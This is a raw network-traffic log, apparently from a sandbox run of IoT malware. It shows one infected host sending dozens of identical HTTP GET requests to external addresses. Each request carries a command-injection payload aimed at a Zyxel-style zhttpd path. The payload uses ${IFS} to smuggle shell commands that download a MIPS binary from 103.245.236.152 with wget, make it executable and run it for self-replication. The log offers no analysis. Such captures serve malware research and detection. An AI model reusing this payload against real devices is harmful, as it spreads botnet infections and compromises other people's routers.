                                      Jan 14, 2024 15:50:46.295037031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4222192.168.2.1456700190.148.239.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295083046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4223192.168.2.1433112118.29.108.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295128107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4224192.168.2.143436442.22.237.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295190096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4225192.168.2.145037675.243.59.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295237064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4226192.168.2.1455004192.44.20.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295268059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4227192.168.2.14328784.167.25.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295340061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4228192.168.2.1453318218.170.23.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295392990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4229192.168.2.145326868.229.194.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295447111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4230192.168.2.1434814158.211.92.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295507908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4231192.168.2.1459788134.131.108.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295563936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4232192.168.2.1448128144.36.178.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295614958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4233192.168.2.14513481.83.108.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295676947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4234192.168.2.144967870.131.2.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295737982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4235192.168.2.144555867.234.40.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295795918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4236192.168.2.1457396144.148.53.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295850992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4237192.168.2.1447912220.228.109.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295908928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4238192.168.2.1457992155.52.206.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.295958996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4239192.168.2.143373081.1.12.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296000957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4240192.168.2.1436570145.225.66.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296042919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4241192.168.2.1453906159.163.57.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296117067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4242192.168.2.146073890.152.40.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296154022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4243192.168.2.143395684.62.114.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296212912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4244192.168.2.144435857.169.109.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296262980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4245192.168.2.144765868.85.83.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296334028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4246192.168.2.1438542114.227.45.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296399117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4247192.168.2.143818860.24.75.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296436071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4248192.168.2.143960282.41.68.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296520948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4249192.168.2.1450394151.63.224.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296556950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4250192.168.2.1436602175.29.0.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296624899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4251192.168.2.1434992172.165.10.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296684027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4252192.168.2.145004697.28.180.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296749115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4253192.168.2.1444564131.136.219.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296813965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4254192.168.2.1441834128.228.181.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296869993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4255192.168.2.1456564112.220.200.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296930075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4256192.168.2.1436750117.127.198.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.296994925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4257192.168.2.143403888.138.19.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297027111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4258192.168.2.1434004209.118.90.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297092915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4259192.168.2.1435174205.191.79.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297147989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4260192.168.2.145332668.79.144.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297216892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4261192.168.2.1460566113.165.247.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297276020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4262192.168.2.1436616157.45.11.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297342062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4263192.168.2.144662451.123.209.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297398090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4264192.168.2.1442126128.232.11.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297456026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4265192.168.2.1444612219.185.179.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297506094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4266192.168.2.1437438108.249.160.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297568083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4267192.168.2.1435964185.80.254.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297642946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4268192.168.2.14515429.7.159.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297697067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4269192.168.2.1455204152.200.112.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297745943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4270192.168.2.1438142126.4.138.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297805071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4271192.168.2.1440662131.104.9.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297851086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4272192.168.2.143280460.12.151.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297900915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4273192.168.2.145848459.104.250.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297924995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4274192.168.2.145188060.87.255.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.297993898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4275192.168.2.145777638.88.45.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.298051119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4276192.168.2.1452316186.164.24.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.298099995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4277192.168.2.1436352196.92.241.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.298157930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4278192.168.2.144354295.241.151.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.298206091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4279192.168.2.145836813.163.55.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.298268080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4280192.168.2.145628698.41.36.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.298319101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4281192.168.2.1436296115.141.192.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.298368931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4282192.168.2.145821861.172.212.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.298450947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4283192.168.2.1454806147.36.240.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.298485994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4284192.168.2.1451606156.211.136.29443
                                      TimestampBytes transferredDirectionData
